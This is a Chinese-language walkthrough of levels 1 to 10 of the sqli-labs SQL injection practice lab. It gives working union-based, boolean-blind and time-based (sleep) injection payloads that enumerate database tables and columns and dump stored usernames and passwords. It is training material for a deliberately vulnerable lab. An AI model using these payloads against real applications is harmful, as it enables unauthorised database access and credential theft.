1.sqli-labs第一关
1.提示你输入数字值的ID作为参数,我们输入?id=1
2.通过数字值不同返回的内容也不同,所以我们输入的内容是带入到数据库里面查询了。
3.接下来我们判断sql语句是否是拼接,且是字符型还是数字型。
4.可以根据结果指定是字符型且存在sql注入漏洞。因为该页面存在回显,所以我们可以使用联合查询。联合查询原理简单说一下,联合查询就是两个sql语句一起查询,两张表具有相同的列数,且字段名是一样的。
第一步:首先知道表格有几列,如果报错就是超过列数,如果显示正常就是没有超出列数。
手动测试查询返回字段个数,爆出显示位,就是看看表格里面那一列是在页面显示的。可以看到是第二列和第三列里面的数据是显示在页面的。
换语法:?id=-1'union select 1,2,3--+
获取当前数据名和版本号,这个就涉及mysql数据库的一些函数
语法:?id=-1'union select 1,database(),version()--+
构造poc:?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
通过上述操作可以得到两个敏感字段就是username和password,接下来我们就要得到该字段对应的内容。我自己加了一个id可以隔一下账户和密码。
?id=-1' union select 1,2,group_concat(username ,id , password) from users--+
2.sqli-labs第二关
第二关和第一关是一样进行判断,当我们输入单引号或者双引号可以看到报错,且报错信息看不到数字,所有我们可以猜测sql语句应该是数字型注入。那步骤和我们第一关是差不多的
语法:
"SELECT * FROM users WHERE id=$id LIMIT 0,1"
"SELECT * FROM users WHERE id=1 ' LIMIT 0,1"出错信息。
?id=1 order by 3
?id=-1 union select 1,2,3
?id=-1 union select 1,database(),version()
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
?id=-1 union select 1,2,group_concat(username ,id , password) from users
3.sqli-labs第三关
第三关当我们在输入?id=2'的时候看到页面报错信息。可推断sql语句是单引号字符型且有括号,所以我们需要闭合单引号且也要考虑括号。
通过上面代码构建就可以进行sql注入。后面所有代码以此为基础进行构造。
?id=2')--+
?id=1') order by 3--+
?id=-1') union select 1,2,3--+
?id=-1') union select 1,database(),version()--+
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1') union select 1,2,group_concat(username ,id , password) from users--+
4.sqli-labs第四关
在id后加入反斜杠\
,发现是双引号括号")
闭合
?id=1") order by 3--+
?id=-1") union select 1,2,3--+
?id=-1") union select 1,database(),version()--+
?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1") union select 1,2,group_concat(username ,id , password) from users--+
5.sqli-labs第五关
寻找注入点
在id后加入反斜杠\
发现这个应该是单引号'闭合
1.使用left()函数进行截取测试
?id=1' and left(version(),1)=3%23 //截取version()最左侧得到的值是否为3,如果为3返回you are in...
?id=1' and left(version(),1)=5%23 //you are in...
2.使用length判断长度
3.利用ascii码猜测数据库名
?id=1' and ascii(substr(database(),1,1))=115%23 //115对应的是s
利用Burp跑出数据库名
1 115 s
2 101 e
3 99 c
4 117 u
5 114 r
6 105 i
7 116 t
8 121 y
库名:security
6.sqli-labs第六关
在id后加入反斜杠\
发现这个应该是双引号"
闭合
直接上轮子,其余步骤和第五关差不多
7.sqli-labs第七关
第七关当在输入id=1,页面显示you are in... 当我们输入id=1'时显示报错,但是没有报错信息,这和我们之前的关卡不一样,之前都有报错信息。当我们输入id=1"时显示正常所以我们可以断定参数id时单引号字符串。因为单引号破坏了他原有语法结构。然后我输入id=1'--+时报错,这时候我们可以输入id=1')--+发现依然报错,之时我试试是不是双括号输入id=1'))--+,发现页面显示正常。那么它的过关手法和前面就一样了选择布尔盲注就可以了。
8.sqli-labs第八关
使用单引号闭合
使用length判断长度
?id=1' and ascii(substr(database(),1,1))=115 -- qwe //正常 库名首字母ascii码115所对应的字母是s
9.sqli-labs第九关
1.使用sleep()函数进行时间盲注
?id=1' and if(ascii(substr(database(),1,1))=100,sleep(10),1) -- qw
bp测试跑包
115很突出,说明库名首字母的ascii码是115所对应的字符是s
10.sqli-labs第十关
第十关和第九关一样只需要将单引号换成双引号。
?id=1" and if(ascii(substr(database(),1,1))=115,1,sleep(5)) -- qwe